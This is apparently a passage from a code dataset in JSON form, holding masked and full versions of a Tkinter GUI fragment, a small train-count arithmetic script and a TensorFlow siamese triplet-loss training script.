bsi_time = tk.Label(root,\r\n background=\"#6367c8\", font=40, foreground=\"#fff\")\r\n bsi_time['text'] = \"Respon Time\"\r\n bsi_time.place(x=570, y=333)\r\n\r\n ########################################################################\r\n\r\n root.mainloop()\r\n\r\n\r\nmain()\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if m % 20 == 0:
m2 = m // 20
c = 20
else:
m2 = m // 20 + 1
c = m % 20
<|reserved_special_token_0|>
if f2 <= 0 or f2 - (20 - c) <= 0:
print('Number of trains needed: ' + str(m2))
else:
print('Number of trains needed: ' + str(1 + (f2 - (20 - c)) // 30 + m2))
<|reserved_special_token_1|>
m = int(input('Enter number of males:'))
f = int(input('Enter number of females:'))
if m % 20 == 0:
m2 = m // 20
c = 20
else:
m2 = m // 20 + 1
c = m % 20
f2 = f - 10 * m2
if f2 <= 0 or f2 - (20 - c) <= 0:
print('Number of trains needed: ' + str(m2))
else:
print('Number of trains needed: ' + str(1 + (f2 - (20 - c)) // 30 + m2))
<|reserved_special_token_1|>
# RUSH HOUR
m = int(input('Enter number of males:'))
f = int(input('Enter number of females:'))
if m%20 == 0:
m2 = m//20
c = 20
else:
m2 = m//20+1
c = m%20
f2 = f - 10*m2
if f2 <= 0 or f2-(20-c) <=0:
print('Number of trains needed: '+str(m2))
else:
print('Number of trains needed: '+str(1+(f2-(20-c))//30+m2))
|
flexible
|
{
"blob_id": "3c6ef57501e01da79f894b36726a93a3a5e0a8f6",
"index": 8068,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif m % 20 == 0:\n m2 = m // 20\n c = 20\nelse:\n m2 = m // 20 + 1\n c = m % 20\n<mask token>\nif f2 <= 0 or f2 - (20 - c) <= 0:\n print('Number of trains needed: ' + str(m2))\nelse:\n print('Number of trains needed: ' + str(1 + (f2 - (20 - c)) // 30 + m2))\n",
"step-3": "m = int(input('Enter number of males:'))\nf = int(input('Enter number of females:'))\nif m % 20 == 0:\n m2 = m // 20\n c = 20\nelse:\n m2 = m // 20 + 1\n c = m % 20\nf2 = f - 10 * m2\nif f2 <= 0 or f2 - (20 - c) <= 0:\n print('Number of trains needed: ' + str(m2))\nelse:\n print('Number of trains needed: ' + str(1 + (f2 - (20 - c)) // 30 + m2))\n",
"step-4": "# RUSH HOUR\r\nm = int(input('Enter number of males:'))\r\nf = int(input('Enter number of females:'))\r\n\r\n\r\nif m%20 == 0:\r\n m2 = m//20\r\n c = 20\r\nelse:\r\n m2 = m//20+1\r\n c = m%20\r\n\r\n\r\nf2 = f - 10*m2\r\n\r\nif f2 <= 0 or f2-(20-c) <=0:\r\n print('Number of trains needed: '+str(m2))\r\nelse:\r\n print('Number of trains needed: '+str(1+(f2-(20-c))//30+m2))\r\n\r\n\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if not os.path.exists(pb_path):
os.makedirs(pb_path)
if not os.path.exists(ckpt_path):
os.makedirs(ckpt_path)
<|reserved_special_token_0|>
if __name__ == '__main__':
first_shape = None
anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='anchor')
similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='similar')
dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='dissimilar')
labels_placeholder = tf.placeholder(tf.float32, shape=[None if
first_shape is None else first_shape * 3], name='labels')
is_training_placeholder = tf.placeholder_with_default(False, shape=(),
name='is_training')
siamese_net = siameseNet.siameseNet()
anchor = siamese_net.inference(anchor_placeholder, reuse=False,
is_training=is_training_placeholder)
similar = siamese_net.inference(similar_placeholder, reuse=True,
is_training=is_training_placeholder)
dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,
is_training=is_training_placeholder)
loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,
labels_placeholder, margin)
flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')
flatten_out_similar = tf.identity(similar, name='flatten_similar')
flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
global_step = tf.Variable(0, trainable=False)
with tf.control_dependencies([tf.group(*update_ops)]):
train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,
global_step=global_step)
var_list = tf.trainable_variables()
if global_step is not None:
var_list.append(global_step)
g_list = tf.global_variables()
bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]
bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]
var_list += bn_moving_vars
ckpt_saver = tf.train.Saver()
train_dataset = dataset.dataset(train_image_root, batch_size,
support_image_extensions, input_height, input_width, channals)
test_dataset = dataset.dataset(test_image_root, batch_size,
support_image_extensions, input_height, input_width, channals)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
total_iters_num = 0
for epoch_num in range(total_epoch_num):
train_images_num = train_dataset.sample_len
cur_epoch_iters_num = train_images_num // batch_size
for iters_num in range(cur_epoch_iters_num):
(train_anchor, train_similar, train_dissimilar, train_labels
) = train_dataset.next_triplet_batch()
test_anchor, test_similar, test_dissimilar, test_labels = (
test_dataset.next_triplet_batch())
if train_anchor is None or test_anchor is None:
continue
train_dict = {anchor_placeholder: train_anchor,
similar_placeholder: train_similar,
dissimilar_placeholder: train_dissimilar,
labels_placeholder: train_labels,
is_training_placeholder: True}
test_dict = {anchor_placeholder: test_anchor,
similar_placeholder: test_similar,
dissimilar_placeholder: test_dissimilar,
labels_placeholder: test_labels,
is_training_placeholder: False}
_, _global_step = sess.run([train_step, global_step],
feed_dict=train_dict)
anchor_out, similar_out, dissimilar_out = sess.run([
flatten_out_anchor, flatten_out_similar,
flatten_out_dissimilar], feed_dict=train_dict)
_train_loss, _train_pos_dist, _train_neg_dist = sess.run([
loss, pos_dist, neg_dist], feed_dict=train_dict)
_test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,
pos_dist, neg_dist], feed_dict=test_dict)
print('distance:', list(zip(_train_pos_dist.flatten(),
_train_neg_dist.flatten()))[:5])
one_moving_meaning_show = 'No mean or variance'
if len(bn_moving_vars) > 0:
one_moving_meaning = sess.graph.get_tensor_by_name(
bn_moving_vars[0].name)
one_moving_meaning_show = '{}={}'.format(bn_moving_vars
[0].name, np.mean(one_moving_meaning.eval()))
print(one_moving_meaning_show)
show_text = (
'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'
.format(epoch_num, iters_num + 1, _global_step,
_train_loss, '0.99', _test_loss))
print(show_text)
if _global_step % snapshot == 0:
constant_graph = graph_util.convert_variables_to_constants(
sess, sess.graph_def, ['flatten_anchor'])
save_model_name = model_name + '-' + str(_global_step
) + '.pb'
with tf.gfile.FastGFile(pb_path + save_model_name, mode
='wb') as fw:
fw.write(constant_graph.SerializeToString())
ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',
global_step=total_iters_num)
print('Successfully saved model {}'.format(save_model_name)
)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
batch_size = 64
input_height = 32
input_width = 32
total_epoch_num = 50
snapshot = 100
support_image_extensions = ['.jpg', '.png', '.jpeg', '.bmp']
margin = 1.0
channals = 3
train_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/train'
test_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/test'
model_path = 'models/'
pb_path = os.path.join(model_path, 'pb/')
ckpt_path = os.path.join(model_path, 'ckpt/')
if not os.path.exists(pb_path):
os.makedirs(pb_path)
if not os.path.exists(ckpt_path):
os.makedirs(ckpt_path)
model_name = 'siamese_triplet_28out_allloss_bn'
if __name__ == '__main__':
first_shape = None
anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='anchor')
similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='similar')
dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='dissimilar')
labels_placeholder = tf.placeholder(tf.float32, shape=[None if
first_shape is None else first_shape * 3], name='labels')
is_training_placeholder = tf.placeholder_with_default(False, shape=(),
name='is_training')
siamese_net = siameseNet.siameseNet()
anchor = siamese_net.inference(anchor_placeholder, reuse=False,
is_training=is_training_placeholder)
similar = siamese_net.inference(similar_placeholder, reuse=True,
is_training=is_training_placeholder)
dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,
is_training=is_training_placeholder)
loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,
labels_placeholder, margin)
flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')
flatten_out_similar = tf.identity(similar, name='flatten_similar')
flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
global_step = tf.Variable(0, trainable=False)
with tf.control_dependencies([tf.group(*update_ops)]):
train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,
global_step=global_step)
var_list = tf.trainable_variables()
if global_step is not None:
var_list.append(global_step)
g_list = tf.global_variables()
bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]
bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]
var_list += bn_moving_vars
ckpt_saver = tf.train.Saver()
train_dataset = dataset.dataset(train_image_root, batch_size,
support_image_extensions, input_height, input_width, channals)
test_dataset = dataset.dataset(test_image_root, batch_size,
support_image_extensions, input_height, input_width, channals)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
total_iters_num = 0
for epoch_num in range(total_epoch_num):
train_images_num = train_dataset.sample_len
cur_epoch_iters_num = train_images_num // batch_size
for iters_num in range(cur_epoch_iters_num):
(train_anchor, train_similar, train_dissimilar, train_labels
) = train_dataset.next_triplet_batch()
test_anchor, test_similar, test_dissimilar, test_labels = (
test_dataset.next_triplet_batch())
if train_anchor is None or test_anchor is None:
continue
train_dict = {anchor_placeholder: train_anchor,
similar_placeholder: train_similar,
dissimilar_placeholder: train_dissimilar,
labels_placeholder: train_labels,
is_training_placeholder: True}
test_dict = {anchor_placeholder: test_anchor,
similar_placeholder: test_similar,
dissimilar_placeholder: test_dissimilar,
labels_placeholder: test_labels,
is_training_placeholder: False}
_, _global_step = sess.run([train_step, global_step],
feed_dict=train_dict)
anchor_out, similar_out, dissimilar_out = sess.run([
flatten_out_anchor, flatten_out_similar,
flatten_out_dissimilar], feed_dict=train_dict)
_train_loss, _train_pos_dist, _train_neg_dist = sess.run([
loss, pos_dist, neg_dist], feed_dict=train_dict)
_test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,
pos_dist, neg_dist], feed_dict=test_dict)
print('distance:', list(zip(_train_pos_dist.flatten(),
_train_neg_dist.flatten()))[:5])
one_moving_meaning_show = 'No mean or variance'
if len(bn_moving_vars) > 0:
one_moving_meaning = sess.graph.get_tensor_by_name(
bn_moving_vars[0].name)
one_moving_meaning_show = '{}={}'.format(bn_moving_vars
[0].name, np.mean(one_moving_meaning.eval()))
print(one_moving_meaning_show)
show_text = (
'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'
.format(epoch_num, iters_num + 1, _global_step,
_train_loss, '0.99', _test_loss))
print(show_text)
if _global_step % snapshot == 0:
constant_graph = graph_util.convert_variables_to_constants(
sess, sess.graph_def, ['flatten_anchor'])
save_model_name = model_name + '-' + str(_global_step
) + '.pb'
with tf.gfile.FastGFile(pb_path + save_model_name, mode
='wb') as fw:
fw.write(constant_graph.SerializeToString())
ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',
global_step=total_iters_num)
print('Successfully saved model {}'.format(save_model_name)
)
<|reserved_special_token_1|>
import tensorflow as tf
from tensorflow.python.framework import graph_util
from net import siameseNet_batchnorm as siameseNet
import dataset
import numpy as np
import cv2
import os
batch_size = 64
input_height = 32
input_width = 32
total_epoch_num = 50
snapshot = 100
support_image_extensions = ['.jpg', '.png', '.jpeg', '.bmp']
margin = 1.0
channals = 3
train_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/train'
test_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/test'
model_path = 'models/'
pb_path = os.path.join(model_path, 'pb/')
ckpt_path = os.path.join(model_path, 'ckpt/')
if not os.path.exists(pb_path):
os.makedirs(pb_path)
if not os.path.exists(ckpt_path):
os.makedirs(ckpt_path)
model_name = 'siamese_triplet_28out_allloss_bn'
if __name__ == '__main__':
first_shape = None
anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='anchor')
similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='similar')
dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,
input_height, input_width, channals], name='dissimilar')
labels_placeholder = tf.placeholder(tf.float32, shape=[None if
first_shape is None else first_shape * 3], name='labels')
is_training_placeholder = tf.placeholder_with_default(False, shape=(),
name='is_training')
siamese_net = siameseNet.siameseNet()
anchor = siamese_net.inference(anchor_placeholder, reuse=False,
is_training=is_training_placeholder)
similar = siamese_net.inference(similar_placeholder, reuse=True,
is_training=is_training_placeholder)
dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,
is_training=is_training_placeholder)
loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,
labels_placeholder, margin)
flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')
flatten_out_similar = tf.identity(similar, name='flatten_similar')
flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
global_step = tf.Variable(0, trainable=False)
with tf.control_dependencies([tf.group(*update_ops)]):
train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,
global_step=global_step)
var_list = tf.trainable_variables()
if global_step is not None:
var_list.append(global_step)
g_list = tf.global_variables()
bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]
bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]
var_list += bn_moving_vars
ckpt_saver = tf.train.Saver()
train_dataset = dataset.dataset(train_image_root, batch_size,
support_image_extensions, input_height, input_width, channals)
test_dataset = dataset.dataset(test_image_root, batch_size,
support_image_extensions, input_height, input_width, channals)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
total_iters_num = 0
for epoch_num in range(total_epoch_num):
train_images_num = train_dataset.sample_len
cur_epoch_iters_num = train_images_num // batch_size
for iters_num in range(cur_epoch_iters_num):
(train_anchor, train_similar, train_dissimilar, train_labels
) = train_dataset.next_triplet_batch()
test_anchor, test_similar, test_dissimilar, test_labels = (
test_dataset.next_triplet_batch())
if train_anchor is None or test_anchor is None:
continue
train_dict = {anchor_placeholder: train_anchor,
similar_placeholder: train_similar,
dissimilar_placeholder: train_dissimilar,
labels_placeholder: train_labels,
is_training_placeholder: True}
test_dict = {anchor_placeholder: test_anchor,
similar_placeholder: test_similar,
dissimilar_placeholder: test_dissimilar,
labels_placeholder: test_labels,
is_training_placeholder: False}
_, _global_step = sess.run([train_step, global_step],
feed_dict=train_dict)
anchor_out, similar_out, dissimilar_out = sess.run([
flatten_out_anchor, flatten_out_similar,
flatten_out_dissimilar], feed_dict=train_dict)
_train_loss, _train_pos_dist, _train_neg_dist = sess.run([
loss, pos_dist, neg_dist], feed_dict=train_dict)
_test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,
pos_dist, neg_dist], feed_dict=test_dict)
print('distance:', list(zip(_train_pos_dist.flatten(),
_train_neg_dist.flatten()))[:5])
one_moving_meaning_show = 'No mean or variance'
if len(bn_moving_vars) > 0:
one_moving_meaning = sess.graph.get_tensor_by_name(
bn_moving_vars[0].name)
one_moving_meaning_show = '{}={}'.format(bn_moving_vars
[0].name, np.mean(one_moving_meaning.eval()))
print(one_moving_meaning_show)
show_text = (
'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'
.format(epoch_num, iters_num + 1, _global_step,
_train_loss, '0.99', _test_loss))
print(show_text)
if _global_step % snapshot == 0:
constant_graph = graph_util.convert_variables_to_constants(
sess, sess.graph_def, ['flatten_anchor'])
save_model_name = model_name + '-' + str(_global_step
) + '.pb'
with tf.gfile.FastGFile(pb_path + save_model_name, mode
='wb') as fw:
fw.write(constant_graph.SerializeToString())
ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',
global_step=total_iters_num)
print('Successfully saved model {}'.format(save_model_name)
)
<|reserved_special_token_1|>
import tensorflow as tf
from tensorflow.python.framework import graph_util
from net import siameseNet_batchnorm as siameseNet
import dataset
import numpy as np
import cv2
import os
batch_size=64
input_height=32
input_width=32
total_epoch_num=50
snapshot=100
support_image_extensions=[".jpg",".png",".jpeg",".bmp"]
margin=1.0
channals=3
train_image_root="D:/forTensorflow/charRecTrain/forMyDNNCode/train"
test_image_root="D:/forTensorflow/charRecTrain/forMyDNNCode/test"
model_path="models/"
pb_path=os.path.join(model_path,"pb/")
ckpt_path=os.path.join(model_path,"ckpt/")
if not os.path.exists(pb_path):
os.makedirs(pb_path)
if not os.path.exists(ckpt_path):
os.makedirs(ckpt_path)
model_name="siamese_triplet_28out_allloss_bn"
if __name__ == '__main__':
# image_paths,labels=get_images_path(test_image_root)
# data=next_batch(True,None,image_paths,labels)
# for left,right,label in zip(*data):
# cv2.imshow("left",left)
# cv2.imshow("right", right)
# print(label)
# cv2.waitKey(0)
first_shape=None
anchor_placeholder = tf.placeholder(tf.float32,shape=[first_shape,input_height,input_width,channals],name="anchor")
similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name="similar")
dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name="dissimilar")
labels_placeholder = tf.placeholder(tf.float32, shape=
[None if first_shape is None else first_shape * 3, ], name="labels")
is_training_placeholder = tf.placeholder_with_default(False, shape=(), name="is_training")
siamese_net=siameseNet.siameseNet()
anchor = siamese_net.inference(anchor_placeholder,reuse=False,is_training=is_training_placeholder)
similar = siamese_net.inference(similar_placeholder,reuse=True,is_training=is_training_placeholder)
dissimilar = siamese_net.inference(dissimilar_placeholder,reuse=True,is_training=is_training_placeholder)
loss,pos_dist,neg_dist = siamese_net.loss(anchor,similar,dissimilar,labels_placeholder,margin)
flatten_out_anchor = tf.identity(anchor, name="flatten_anchor")
flatten_out_similar = tf.identity(similar, name="flatten_similar")
flatten_out_dissimilar = tf.identity(dissimilar, name="flatten_dissimilar")
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
global_step = tf.Variable(0, trainable=False)
# learning_rate = tf.train.exponential_decay(0.01, global_step, 100, 0.9)
# optimizer = tf.train.MomentumOptimizer(learning_rate, 0.9)
with tf.control_dependencies([tf.group(*update_ops)]):
# train_step = optimizer.minimize(loss, global_step)
train_step = tf.train.MomentumOptimizer(0.01, 0.90).\
minimize(loss, global_step=global_step)
var_list = tf.trainable_variables()
if global_step is not None:
var_list.append(global_step)
g_list = tf.global_variables() # 从全局变量中获得batch norm的缩放和偏差
bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]
bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]
var_list += bn_moving_vars
ckpt_saver = tf.train.Saver()
train_dataset = dataset.dataset(train_image_root,batch_size,support_image_extensions,
input_height,input_width,channals)
test_dataset = dataset.dataset(test_image_root, batch_size, support_image_extensions,
input_height, input_width, channals)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
# if os.path.exists(os.path.join(ckpt_path, "checkpoint")):
# ckpt_saver.restore(sess, tf.train.latest_checkpoint(ckpt_path))
total_iters_num = 0
for epoch_num in range(total_epoch_num):
train_images_num = train_dataset.sample_len
cur_epoch_iters_num = train_images_num // batch_size
for iters_num in range(cur_epoch_iters_num):
train_anchor, train_similar, train_dissimilar,train_labels = \
train_dataset.next_triplet_batch()
test_anchor, test_similar, test_dissimilar,test_labels = \
test_dataset.next_triplet_batch()
if train_anchor is None or test_anchor is None:
continue
train_dict = {anchor_placeholder: train_anchor,
similar_placeholder: train_similar,
dissimilar_placeholder: train_dissimilar,
labels_placeholder:train_labels,
is_training_placeholder:True}
test_dict = {anchor_placeholder: test_anchor,
similar_placeholder: test_similar,
dissimilar_placeholder: test_dissimilar,
labels_placeholder:test_labels,
is_training_placeholder: False}
_,_global_step=sess.run([train_step,global_step], feed_dict=train_dict)
anchor_out,similar_out,dissimilar_out = sess.run([
flatten_out_anchor,flatten_out_similar,flatten_out_dissimilar],
feed_dict=train_dict)
_train_loss,_train_pos_dist,_train_neg_dist = \
sess.run([loss,pos_dist,neg_dist], feed_dict=train_dict)
_test_loss,_test_pos_dist,_test_neg_dist =\
sess.run([loss,pos_dist,neg_dist], feed_dict=test_dict)
print("distance:",list(zip(_train_pos_dist.flatten(),_train_neg_dist.flatten()))[:5])
one_moving_meaning_show = "No mean or variance"
if len(bn_moving_vars) > 0:
one_moving_meaning = sess.graph.get_tensor_by_name(bn_moving_vars[0].name)
one_moving_meaning_show = "{}={}".\
format(bn_moving_vars[0].name,np.mean(one_moving_meaning.eval()))
print(one_moving_meaning_show)
show_text = "epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}".format \
(epoch_num, iters_num + 1, _global_step, _train_loss, "0.99", _test_loss)
print(show_text)
if _global_step % snapshot == 0:
# 保存PB
constant_graph = graph_util.convert_variables_to_constants(sess, sess.graph_def, ["flatten_anchor"])
save_model_name=model_name + "-" + str(_global_step) + ".pb"
with tf.gfile.FastGFile(pb_path + save_model_name, mode="wb") as fw:
fw.write(constant_graph.SerializeToString())
# 保存CKPT
ckpt_saver.save(sess, ckpt_path + model_name + ".ckpt", global_step=total_iters_num)
print("Successfully saved model {}".format(save_model_name))
|
flexible
|
{
"blob_id": "97bbb181cbc0f5bfbf0b2298133fc226b6217d91",
"index": 399,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\n<mask token>\nif __name__ == '__main__':\n first_shape = None\n anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='anchor')\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='similar')\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='dissimilar')\n labels_placeholder = tf.placeholder(tf.float32, shape=[None if \n first_shape is None else first_shape * 3], name='labels')\n is_training_placeholder = tf.placeholder_with_default(False, shape=(),\n name='is_training')\n siamese_net = siameseNet.siameseNet()\n anchor = siamese_net.inference(anchor_placeholder, reuse=False,\n is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,\n labels_placeholder, margin)\n flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')\n flatten_out_similar = tf.identity(similar, name='flatten_similar')\n flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n with tf.control_dependencies([tf.group(*update_ops)]):\n train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,\n global_step=global_step)\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables()\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 
'moving_variance' in g.name]\n var_list += bn_moving_vars\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n test_dataset = dataset.dataset(test_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n (train_anchor, train_similar, train_dissimilar, train_labels\n ) = train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar, test_labels = (\n test_dataset.next_triplet_batch())\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n labels_placeholder: train_labels,\n is_training_placeholder: True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n labels_placeholder: test_labels,\n is_training_placeholder: False}\n _, _global_step = sess.run([train_step, global_step],\n feed_dict=train_dict)\n anchor_out, similar_out, dissimilar_out = sess.run([\n flatten_out_anchor, flatten_out_similar,\n flatten_out_dissimilar], feed_dict=train_dict)\n _train_loss, _train_pos_dist, _train_neg_dist = sess.run([\n loss, pos_dist, neg_dist], feed_dict=train_dict)\n _test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,\n pos_dist, neg_dist], feed_dict=test_dict)\n print('distance:', list(zip(_train_pos_dist.flatten(),\n _train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = 'No mean or variance'\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(\n bn_moving_vars[0].name)\n 
one_moving_meaning_show = '{}={}'.format(bn_moving_vars\n [0].name, np.mean(one_moving_meaning.eval()))\n print(one_moving_meaning_show)\n show_text = (\n 'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'\n .format(epoch_num, iters_num + 1, _global_step,\n _train_loss, '0.99', _test_loss))\n print(show_text)\n if _global_step % snapshot == 0:\n constant_graph = graph_util.convert_variables_to_constants(\n sess, sess.graph_def, ['flatten_anchor'])\n save_model_name = model_name + '-' + str(_global_step\n ) + '.pb'\n with tf.gfile.FastGFile(pb_path + save_model_name, mode\n ='wb') as fw:\n fw.write(constant_graph.SerializeToString())\n ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',\n global_step=total_iters_num)\n print('Successfully saved model {}'.format(save_model_name)\n )\n",
"step-3": "<mask token>\nbatch_size = 64\ninput_height = 32\ninput_width = 32\ntotal_epoch_num = 50\nsnapshot = 100\nsupport_image_extensions = ['.jpg', '.png', '.jpeg', '.bmp']\nmargin = 1.0\nchannals = 3\ntrain_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/train'\ntest_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/test'\nmodel_path = 'models/'\npb_path = os.path.join(model_path, 'pb/')\nckpt_path = os.path.join(model_path, 'ckpt/')\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\nmodel_name = 'siamese_triplet_28out_allloss_bn'\nif __name__ == '__main__':\n first_shape = None\n anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='anchor')\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='similar')\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='dissimilar')\n labels_placeholder = tf.placeholder(tf.float32, shape=[None if \n first_shape is None else first_shape * 3], name='labels')\n is_training_placeholder = tf.placeholder_with_default(False, shape=(),\n name='is_training')\n siamese_net = siameseNet.siameseNet()\n anchor = siamese_net.inference(anchor_placeholder, reuse=False,\n is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,\n labels_placeholder, margin)\n flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')\n flatten_out_similar = tf.identity(similar, name='flatten_similar')\n flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')\n update_ops = 
tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n with tf.control_dependencies([tf.group(*update_ops)]):\n train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,\n global_step=global_step)\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables()\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n test_dataset = dataset.dataset(test_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n (train_anchor, train_similar, train_dissimilar, train_labels\n ) = train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar, test_labels = (\n test_dataset.next_triplet_batch())\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n labels_placeholder: train_labels,\n is_training_placeholder: True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: 